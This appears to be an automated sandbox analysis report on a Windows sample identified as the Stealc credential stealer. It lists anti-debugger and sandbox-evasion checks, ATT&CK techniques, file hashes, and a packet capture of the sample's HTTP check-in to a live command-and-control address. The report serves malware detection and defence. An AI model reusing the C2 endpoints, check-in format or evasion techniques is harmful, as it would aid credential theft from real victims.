              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4A60 VirtualProtect 00000000,00000004,00000100,?0_2_003A4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 mov eax, dword ptr fs:[00000030h]0_2_003C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1228, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_003C4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003C46A0
              Source: file.exeBinary or memory string: Program Manager
              Source: file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003C2C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1228, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1228, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpktop100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/ug100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpaoNw100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpmoZw100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpyo&w100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/Pg100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpaoNwfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.206file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://185.215.113.206/Lfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/c4becf79229cb002.phpktopfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/wsfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/c4becf79229cb002.php/ugfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://185.215.113.206/c4becf79229cb002.phpyo&wfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://185.215.113.206/c4becf79229cb002.phpmoZwfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://185.215.113.206/c4becf79229cb002.php/Pgfile.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        unknownPortugal
                        206894WHOLESALECONNECTIONSNLtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1559010
                        Start date and time:2024-11-20 03:19:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 27s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 79%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 124
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 185.215.113.16
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.944327673641293
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'801'728 bytes
                        MD5:af00fae5bf606001c0c6ef0b98fb54d0
                        SHA1:a24fe73ec0b2d0190d3f6f068ca3c13a6cde4fd3
                        SHA256:8b1fbd75e6fcdf963260148537cae0d876130656c343518a5d7623937d4f0881
                        SHA512:e08d6691ed7092e2f569391ef89c6b3528630ff449372b064e06ebde2e7de482517e7407c81ce75a190d74936c64a0c31f5acc23efeffe6f54622184f780a5bc
                        SSDEEP:24576:fVIhhuGqyQIrSITgOIubNQb6KAnOMK0HKKEfbULhQmo1936905EnoK5RLSEzqt9v:uh8IrZhrO2KAnOMg5fbULhQmo19Cnqb
                        TLSH:17853355DEC666E0E67E86F9770C87843B59239FAEFAC1F5FEE002281C8205F5919C60
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xa92000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F292CE9C5DAh
                        subps xmm3, dqword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x16200d6f13f17e6a79c73421c743cdce28c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x1ac0x20039d4613d55d52d41d5360c194a837365False0.578125data4.541392078148798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x2a70000x20054346984e78ef8836001674a722ce650unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        bvkzsckp0x4f30000x19e0000x19e0006960613a441b5f415526ca56ddf62bcaFalse0.9949526579483695data7.954205119392446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        wpxlzhew0x6910000x10000x40013a437cba064864885176c8084354487False0.736328125data5.8538902746469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6920000x30000x22006c5ba68e051dd9e3cf504a5b560b9c4cFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x690eac0x152ASCII text, with CRLF line terminators0.6479289940828402
                        DLLImport
                        kernel32.dlllstrcpy
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-20T03:20:38.086111+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749705185.215.113.20680TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 20, 2024 03:20:37.051583052 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:37.139990091 CET8049705185.215.113.206192.168.2.7
                        Nov 20, 2024 03:20:37.140111923 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:37.141319990 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:37.146173000 CET8049705185.215.113.206192.168.2.7
                        Nov 20, 2024 03:20:37.857381105 CET8049705185.215.113.206192.168.2.7
                        Nov 20, 2024 03:20:37.857470036 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:37.859996080 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:37.864850998 CET8049705185.215.113.206192.168.2.7
                        Nov 20, 2024 03:20:38.086021900 CET8049705185.215.113.206192.168.2.7
                        Nov 20, 2024 03:20:38.086111069 CET4970580192.168.2.7185.215.113.206
                        Nov 20, 2024 03:20:41.176920891 CET4970580192.168.2.7185.215.113.206
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 20, 2024 03:20:52.066898108 CET53495401.1.1.1192.168.2.7
                        • 185.215.113.206
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749705185.215.113.206801228C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 20, 2024 03:20:37.141319990 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 20, 2024 03:20:37.857381105 CET203INHTTP/1.1 200 OK
                        Date: Wed, 20 Nov 2024 02:20:37 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 20, 2024 03:20:37.859996080 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a
                        Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
                        Nov 20, 2024 03:20:38.086021900 CET210INHTTP/1.1 200 OK
                        Date: Wed, 20 Nov 2024 02:20:37 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Target ID:0
                        Start time:21:20:31
                        Start date:19/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x3a0000
                        File size:1'801'728 bytes
                        MD5 hash:AF00FAE5BF606001C0C6EF0B98FB54D0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.6%
                          Total number of Nodes:1404
                          Total number of Limit Nodes:28
                          execution_graph 27762 3af639 144 API calls 27765 3a16b9 200 API calls 27768 3abf39 177 API calls 27780 3babb2 120 API calls 27754 3c3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27770 3b4b29 303 API calls 27781 3b23a9 298 API calls 27744 3c30a0 GetSystemPowerStatus 27759 3c29a0 GetCurrentProcess IsWow64Process 27782 3b8615 47 API calls 27745 3b2499 290 API calls 27783 3adb99 670 API calls 27755 3c4e35 6 API calls 27736 3c2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27771 3c9711 MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar __setmbcp 27747 3b8c88 16 API calls 27772 3ab309 98 API calls 27737 3a100e GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27748 3c2880 10 API calls 27749 3c4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27750 3c3480 6 API calls 27766 3c3280 7 API calls 27751 3be0f9 140 API calls 27773 3b6b79 138 API calls 27767 3bf2f8 93 API calls 27774 3a1b64 162 API calls 27784 3abbf9 90 API calls 26298 3c1bf0 26350 3a2a90 26298->26350 26302 3c1c03 26303 3c1c29 lstrcpy 26302->26303 26304 3c1c35 26302->26304 26303->26304 26305 3c1c6d GetSystemInfo 26304->26305 26306 3c1c65 ExitProcess 26304->26306 26307 3c1c7d ExitProcess 26305->26307 26308 3c1c85 26305->26308 26451 3a1030 GetCurrentProcess VirtualAllocExNuma 26308->26451 26313 3c1cb8 26463 3c2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 26313->26463 26314 3c1ca2 26314->26313 26315 3c1cb0 ExitProcess 26314->26315 26317 3c1cbd 26318 3c1ce7 lstrlen 26317->26318 26672 3c2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26317->26672 26322 3c1cff 26318->26322 26320 3c1cd1 26320->26318 26325 3c1ce0 ExitProcess 26320->26325 26321 3c1d23 lstrlen 26323 3c1d39 26321->26323 26322->26321 26324 3c1d13 lstrcpy lstrcat 26322->26324 26326 3c1d5a 